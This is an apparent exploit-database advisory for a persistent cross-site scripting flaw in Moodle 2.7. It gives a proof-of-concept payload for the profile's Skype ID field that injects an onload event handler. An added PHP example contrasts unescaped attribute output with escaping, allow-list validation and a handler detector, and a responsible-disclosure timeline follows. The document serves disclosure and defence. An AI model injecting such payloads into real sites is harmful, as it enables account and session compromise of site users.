Moodle 2.7 - Persistent Cross-Site Scripting Vulnerability

ID 1337DAY-ID-22480
Type zdt
Reporter Osanda Malith
Modified 2014-07-27T00:00:00


Exploit for php platform in category web applications

Title: Moodle 2.7 Persistent XSS
Moodle advisory:
Researched by: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda[cat]
Original write-up:
[-] POC
1. Edit your profile
2. Click Optional
3. In Skype ID field inject this payload
x" onload="prompt('XSS by Osanda')">"
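
The payload above closes a double-quoted attribute and appends an event handler. The PHP below is an added example, not Moodle's code and not part of the original write-up: it assumes the stored Skype ID is echoed into an img src attribute, and contrasts unescaped output with context-aware encoding plus an allow-list check on save. The host name, markup and function names are hypothetical.

```php
<?php
// Added illustration, not Moodle source. Markup, host and function names are hypothetical.

// PoC value from the advisory, as stored in the profile's Skype ID field.
$skype = 'x" onload="prompt(\'XSS by Osanda\')">"';

// Vulnerable pattern: stored value concatenated into a double-quoted attribute.
function render_unsafe(string $id): string {
    return '<img src="https://status.example.invalid/icon/' . $id . '" alt="status">';
}

// Hardened output: URL-encode the path segment, then HTML-escape the attribute value.
function render_safe(string $id): string {
    $url = 'https://status.example.invalid/icon/' . rawurlencode($id);
    return '<img src="' . htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '" alt="status">';
}

// Defence in depth on save: allow-list check (character set is an assumption).
function is_plausible_handle(string $id): bool {
    return preg_match('/\A[A-Za-z0-9._:-]{1,64}\z/', $id) === 1;
}

// Parse the markup and list event-handler attributes (on*) found on <img> elements.
function handler_attrs(string $html): array {
    libxml_use_internal_errors(true);   // fragment is not a full document
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $found = [];
    foreach ($doc->getElementsByTagName('img') as $img) {
        foreach ($img->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                $found[] = $attr->name;
            }
        }
    }
    return $found;
}

echo "unsafe: ", render_unsafe($skype), "\n";
echo "  handlers: ", json_encode(handler_attrs(render_unsafe($skype))), "\n";
echo "safe:   ", render_safe($skype), "\n";
echo "  handlers: ", json_encode(handler_attrs(render_safe($skype))), "\n";
echo "validator accepts PoC value: ", var_export(is_plausible_handle($skype), true), "\n";
```
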
[-] Disclosure Timeline
2014-05-24: Responsibly disclosed to the Vendor
2014-05-27: Suggested a fix
2014-06-04: Fix got accepted
2014-07-21: Vendor releases a security announcement
2014-07-24: Released Moodle 2.7.1 stable with all patches
